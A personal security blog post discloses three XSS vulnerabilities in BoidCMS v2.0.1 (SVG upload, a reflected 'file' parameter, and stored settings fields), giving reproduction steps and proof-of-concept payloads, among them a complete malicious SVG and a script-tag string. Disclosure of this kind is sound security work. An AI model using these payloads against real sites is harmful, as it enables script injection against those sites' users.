Saturday 2 March 2024

Friday Fun Pentest Series - 1 - boidcmsv2.0.1

BoidCMS v2.0.1

Description

- Stored XSS

- Reflected XSS

- XSS via SVG File Upload


XSS via SVG File Upload

Steps to Reproduce:

  1. Login with admin user
  2. Visit "Media" page
  3. Upload xss.svg
  4. Click "View" and XSS payload will execute

// xss.svg contents

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(`XSS`);
   </script>
</svg>


Reflected XSS

Steps to Reproduce:
  1. Login as admin
  2. Visit "Media" page
  3. Click "Delete" and intercept the HTTP GET request
  4. In "file" parameter add the payload "<script>alert(1)</script>"
  5. After forwarding the HTTP GET request a browser popup would surface

Stored XSS

Steps to Reproduce:
    1. Login as admin
    2. Visit "Settings" page
    3. Enter XSS payload in "Title", "Subtitle", "Footer"
    4. Then visit the blog page

    Conclusion

    - Had lots of fun fuzzing the application
    - Until next Friday!
    - Cheers

    at

    No comments:

    Post a Comment

    Subscribe to: Post Comments (Atom)

    Friday Fun Pentest Series - 5 - spa-cartcmsv1.9.0.6

    Description - It was found that the application suffers from business logic flaw - Additionally the application is vulnerable to username en...